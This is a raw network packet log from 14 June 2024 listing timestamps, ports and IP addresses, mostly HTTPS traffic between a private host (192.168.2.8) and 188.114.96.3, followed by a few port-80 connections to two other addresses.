Jun 14, 2024 15:15:17.725075006 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.725792885 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.725857019 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.725887060 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.725946903 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.726706982 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.726785898 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.726813078 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.726878881 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.727494001 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.727556944 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.727586985 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.727643967 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.728334904 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.728399992 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.814595938 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.814682007 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.814774990 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.814850092 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.815026045 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.815093040 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.815125942 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.815190077 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.815506935 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.815571070 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.815608978 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.815669060 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.827131987 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.827218056 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.827261925 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.827332020 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.839962006 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.840048075 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.840056896 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.840087891 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.840106010 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.840342999 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.853965998 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.854064941 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.854289055 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.854341030 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.854681015 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.854739904 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.854764938 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.854814053 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.855151892 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.855205059 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.855268955 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.855321884 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.855788946 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.855849981 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.856077909 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.856126070 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.856189966 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.856247902 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.856293917 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.856342077 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.857129097 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.857198954 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.857294083 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.857383966 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.857384920 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.857409954 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.857455969 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.858186007 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.858263016 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.858295918 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.858350992 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.858395100 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.858443975 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.859044075 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.859119892 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.930638075 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.930653095 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.930671930 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.930711985 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.930741072 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.930757046 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.930778980 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.930799961 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.987891912 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.987998009 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.988029003 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988050938 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988131046 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.988140106 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988564968 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988610983 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988629103 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.988640070 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988667965 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.988881111 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988926888 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988935947 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.988945961 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.988975048 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:17.989980936 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:17.990040064 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.060995102 CEST	49710	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.061033964 CEST	443	49710	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:18.080373049 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.080425024 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:18.080594063 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.080840111 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.080852032 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:18.697763920 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:18.700265884 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:18.700297117 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488367081 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488404989 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488430977 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488462925 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488496065 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488518953 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488543034 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488564968 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488589048 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.488641977 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.488641977 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.488641977 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.488641977 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.488662958 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.489315987 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.489326000 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493558884 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493582964 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493607044 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493629932 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493638039 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.493645906 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493668079 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493671894 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.493855953 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493886948 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493913889 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493927002 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.493927002 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.493933916 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.493961096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.494755983 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.494780064 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.494802952 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.494815111 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.494818926 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495037079 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.495043993 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495223999 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.495570898 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495611906 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495640039 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495663881 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.495711088 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.495718956 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.496217012 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.496241093 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.496262074 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.496263027 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.496279955 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.496465921 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.496493101 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.496500015 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.497397900 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.497404099 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.498523951 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.498658895 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.498802900 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.499361038 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.499557018 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.499607086 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.499607086 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.499607086 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.499624014 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.502662897 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.503205061 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.504028082 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.504081964 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.504081964 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.504081964 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.504098892 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.504159927 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.504262924 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.504262924 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.504270077 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508536100 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508564949 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508609056 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508645058 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508677959 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508709908 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.508733988 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.508734941 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.508734941 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.508734941 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.508743048 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.512274027 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.512274027 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.537687063 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.540263891 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.609180927 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.609256029 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.609579086 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.609632015 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.609632015 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.609632015 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.609644890 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.611305952 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.611354113 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.611407042 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.611805916 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.611860037 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.611860037 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.611860037 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.611860037 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.611860037 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.611867905 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.612262011 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.619410038 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.619550943 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.620191097 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.620204926 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.620516062 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.626544952 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.626583099 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.626878977 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627029896 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627074957 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.627074957 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.627074957 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.627074957 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.627089024 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627321959 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627625942 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627662897 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.627701998 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628266096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628266096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628266096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628266096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628279924 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628607035 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628640890 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628720045 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628880978 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628914118 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.628926992 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628926992 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628926992 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628926992 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628926992 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.628936052 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629064083 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.629353046 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629406929 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629494905 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629534960 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629568100 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.629568100 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.629575014 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.629708052 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.677370071 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.677380085 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.724261999 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.725050926 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725060940 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725100994 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725119114 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725176096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.725176096 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.725336075 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725343943 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725373030 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725384951 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.725450039 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.725450039 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727267027 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727276087 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727313995 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727344990 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727390051 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727390051 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727413893 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727581978 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727612019 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727626085 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727668047 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727668047 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727668047 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.727677107 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.727865934 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.728446960 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.728465080 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.730087996 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.730109930 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.732283115 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.732283115 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.732296944 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.735433102 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.735476017 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.735562086 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.735615969 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.735615969 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.735615969 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.735624075 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.750659943 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.750720024 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.750741959 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.750761986 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.751787901 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.751852036 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.751852036 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.751859903 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.751888037 CEST	443	49713	188.114.96.3	192.168.2.8
Jun 14, 2024 15:15:19.752266884 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:19.755031109 CEST	49713	443	192.168.2.8	188.114.96.3
Jun 14, 2024 15:15:23.836045980 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:23.841216087 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:23.841310978 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:23.841526985 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:23.846345901 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:25.230618000 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:25.230986118 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:25.231041908 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:25.231199026 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:25.231231928 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:26.238965988 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:26.244424105 CEST	80	54304	104.16.185.241	192.168.2.8
Jun 14, 2024 15:15:26.244488955 CEST	54304	80	192.168.2.8	104.16.185.241
Jun 14, 2024 15:15:26.250313997 CEST	54305	80	192.168.2.8	208.95.112.1
Jun 14, 2024 15:15:26.255223036 CEST	80	54305	208.95.112.1	192.168.2.8
Jun 14, 2024 15:15:26.255295038 CEST	54305	80	192.168.2.8	208.95.112.1
Jun 14, 2024 15:15:26.255616903 CEST	54305	80	192.168.2.8	208.95.112.1
Jun 14, 2024 15:15:26.260468006 CEST	80	54305	208.95.112.1	192.168.2.8
Jun 14, 2024 15:15:26.848088980 CEST	80	54305	208.95.112.1	192.168.2.8
